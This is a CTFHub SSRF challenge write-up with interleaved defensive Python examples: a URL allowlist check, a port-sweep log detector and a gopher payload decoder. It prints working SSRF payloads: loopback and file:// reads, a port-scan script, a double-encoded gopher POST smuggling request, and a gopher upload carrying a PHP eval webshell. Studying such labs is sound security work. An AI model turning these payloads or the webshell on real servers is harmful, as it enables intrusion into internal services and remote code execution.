CTFHUB---SSRF

What is SSRF?
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker crafts input that makes the server itself issue a network request. A service that can make outbound requests is used as a pivot to reach other services, so the targets of SSRF are usually on the internal network.


1. Internal network access

Construct the URL:

http://challenge-4d3d62136e2a8980.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php


2. Reading a file through a pseudo-protocol

http://challenge-3ccdfc8b22d98eb3.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

Check the page source.
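From the defending side, the check a fetcher should run on its ?url= parameter before following it, as an added example that is not code from the post or from CTFHub. It rejects the loopback target of section 1, the file:// read of section 2 and the gopher:// URLs used further down; the injectable resolver and the stub addresses are assumptions so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Added example (not code from the post or from CTFHub): the allowlist check a
# server-side fetcher should apply to a user-supplied ?url= value. It rejects the
# vectors used here: loopback targets (1), file:// reads (2) and gopher:// URLs (4).
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

def is_internal(ip_text):
    """True for loopback, RFC 1918, link-local (169.254.x.x), reserved and similar ranges."""
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def system_resolver(host):
    """Every address the system resolver returns for host (default when none is injected)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]

def check_target(url, resolver=system_resolver):
    """Return (allowed, reason); the resolver is injectable so the check can run offline."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        # Rejects file://, gopher://, dict:// and scheme-less values such as "127.0.0.1/flag.php".
        return False, "scheme not allowed: %r" % parsed.scheme
    host = parsed.hostname
    if not host:
        return False, "missing host"
    port = parsed.port or (443 if parsed.scheme == "https" else 80)  # malformed port raises ValueError: reject
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port
    try:
        ipaddress.ip_address(host)
        addrs = [host]  # IP literal: nothing to resolve
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            addrs = []
    if not addrs:
        return False, "unresolvable host"
    # Every record must be external (one internal A record is enough to pivot), and the
    # fetcher must connect to the vetted address itself, or DNS rebinding defeats the check.
    for addr in addrs:
        if is_internal(addr):
            return False, "resolves to internal address %s" % addr
    return True, "ok"
```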


3. Port scanning

import requests

# Sweep ports 8000-9000 on the challenge host's loopback interface through the ?url=
# parameter and print any response that contains 'ctfhub' (the flag prefix).
try:
    for i in range(8000, 9001):
        url = 'http://challenge-c383792e4e5d3cbe.sandbox.ctfhub.com:10800/?url=127.0.0.1:' + str(i)
        data = requests.get(url).text
        if 'ctfhub' in data:
            print(data)
except Exception:
    print('cuo')

python 端口扫描.py
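A detection counterpart to the scan above, as an added example that is not part of the original post: it parses constructed common-log-format lines and flags a client whose ?url= values reach many distinct ports on a loopback host. The threshold, the sample log and the loopback host list are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Added example (not code from the post or from CTFHub): detect the port sweep of
# section 3 in web access logs. One client asking ?url= to reach many distinct ports
# on a loopback host is the signature of a scan routed through the fetcher.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TARGET_RE = re.compile(r'^(?:[A-Za-z][\w+.-]*://)?(?P<host>[^/:?#]+)(?::(?P<port>\d{1,5}))?')
# Names that mean "the fetcher itself"; IPv6 literals and private ranges are left out for brevity.
LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "0.0.0.0"}

def target_of(path):
    """(host, port) named by the ?url= parameter of a request path, or None if there is none."""
    values = parse_qs(urlparse(path).query).get("url")
    if not values:
        return None
    m = TARGET_RE.match(values[0])
    if not m:
        return None
    return m.group("host"), int(m.group("port") or 80)

def find_port_sweeps(lines, min_ports=20):
    """Sources whose ?url= values touched >= min_ports distinct ports on a loopback host."""
    ports_seen = defaultdict(set)  # (source ip, target host) -> set of target ports
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        tgt = target_of(m.group("path"))
        if tgt and tgt[0] in LOOPBACK_HOSTS:
            ports_seen[(m.group("src"), tgt[0])].add(tgt[1])
    return sorted((src, host, len(ports), min(ports), max(ports))
                  for (src, host), ports in ports_seen.items() if len(ports) >= min_ports)

# Constructed sample: one client sweeping 40 ports, another making two ordinary requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Apr/2022:12:00:%02d +0000] "GET /?url=127.0.0.1:%d HTTP/1.1" 200 12'
    % (i % 60, 8000 + i) for i in range(40)
] + [
    '10.0.0.9 - - [10/Apr/2022:12:01:00 +0000] "GET /?url=http://example.com/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Apr/2022:12:01:05 +0000] "GET /?url=127.0.0.1/flag.php HTTP/1.1" 200 44',
]

if __name__ == "__main__":
    for src, host, n, lo, hi in find_port_sweeps(SAMPLE_LOG):
        print("possible SSRF port sweep from %s: %d ports on %s (%d-%d)" % (src, n, host, lo, hi))
```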


4. POST request

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=583ee4e219514f2541cacb39d9d9c20d

URL-encode it twice. The web server decodes the ?url= query string once, and the gopher client decodes the selector a second time before sending it, so the CR/LF and space characters have to survive both passes (%0D%0A becomes %250D%250A).

The payload, piece by piece (challenge host, gopher prefix, request line and headers, body):

http://challenge-f042963869e9d0d9.sandbox.ctfhub.com:10800/?

url=gopher%3A//127.0.0.1%3A80/_%250D%250A

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250A

key%253Defb8a28f7d870d70c2cdd0d9a1e4eacf

Assembled into one URL:

http://challenge-f042963869e9d0d9.sandbox.ctfhub.com:10800/?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253Defb8a28f7d870d70c2cdd0d9a1e4eacf

It is a bit slow.
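To see what the double-encoded URL above actually makes the server send, an added example (not the author's code) that reverses both decoding steps and splits out the embedded request for inspection. The ?url= value is copied from the assembled URL above; the function names and the urlsplit-based handling of the selector are my assumptions.

```python
from urllib.parse import unquote, urlsplit

# Added example (not code from the post or from CTFHub): reverse the two decoding steps
# a double-encoded gopher:// value goes through, so a reviewer or a request-inspection
# rule can see the HTTP request the fetcher would emit on the server's behalf.

def decode_gopher_payload(query_value):
    """query_value is the ?url= value as it appears on the wire (percent-encoded once).
    Returns (host, port, item_type, payload) of the gopher selector."""
    url = unquote(query_value)            # step 1: the web server decodes the query string
    parts = urlsplit(url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher URL: %r" % parts.scheme)
    selector = parts.path[1:]             # drop the leading "/" ...
    if parts.query:
        selector += "?" + parts.query
    item_type, encoded = selector[:1], selector[1:]   # ... and the one-char item type ("_")
    payload = unquote(encoded)            # step 2: the gopher client decodes the selector
    return parts.hostname, parts.port, item_type, payload

def smuggled_request(query_value):
    """Split the decoded payload into (request_line, headers, body) for inspection."""
    _, _, _, payload = decode_gopher_payload(query_value)
    head, _, body = payload.lstrip("\r\n").partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = dict(h.split(": ", 1) for h in header_lines)
    return request_line, headers, body

# The ?url= value from the section-4 URL above, split across lines for readability.
PAGE_PAYLOAD = ("gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250A"
                "Host%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250A"
                "Content-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250A"
                "key%253Defb8a28f7d870d70c2cdd0d9a1e4eacf")

if __name__ == "__main__":
    host, port, item, _ = decode_gopher_payload(PAGE_PAYLOAD)
    line, hdrs, body = smuggled_request(PAGE_PAYLOAD)
    print("gopher target %s:%s item %r -> %s" % (host, port, item, line))
    for k, v in hdrs.items():
        print("  %s: %s" % (k, v))
    print("  body (%d bytes, Content-Length %s): %s" % (len(body), hdrs.get("Content-Length"), body))
```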


5. File upload

Ran into problems with this one.

GET /?url=_ HTTP/1.1
Host: challenge-670abe4f4308b949.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

POST%2520%252Fflag.php%2520HTTP%252F1.1%250AHost%253A%2520challenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520WOW64%253B%2520rv%253A52.0)%2520Gecko%252F20100101%2520Firefox%252F52.0%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250AReferer%253A%2520http%253A%252F%252Fchallenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250ADNT%253A%25201%250AConnection%253A%2520close%250AUpgrade-Insecure-Requests%253A%25201%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------541164717975%250AContent-Length%253A%2520330%250A%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250AContent-Type%253A%2520application%252Foctet-stream%250A%250A%253C%253Fphp%2520%2540eval(%2524_POST%255B'123'%255D)%253B%253F%253E%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250A%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250A-----------------------------541164717975--%250A


GET /?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250AHost%253A%2520challenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520WOW64%253B%2520rv%253A52.0)%2520Gecko%252F20100101%2520Firefox%252F52.0%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250AReferer%253A%2520http%253A%252F%252Fchallenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250ADNT%253A%25201%250AConnection%253A%2520close%250AUpgrade-Insecure-Requests%253A%25201%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------541164717975%250AContent-Length%253A%2520330%250A%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250AContent-Type%253A%2520application%252Foctet-stream%250A%250A%253C%253Fphp%2520%2540eval(%2524_POST%255B'123'%255D)%253B%253F%253E%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250A%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250A-----------------------------541164717975--%250A

Host: challenge-670abe4f4308b949.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


6. FastCGI protocol

Author: TinKode
Link: https://www.cnblogs.com/TinKode123/p/16150258.html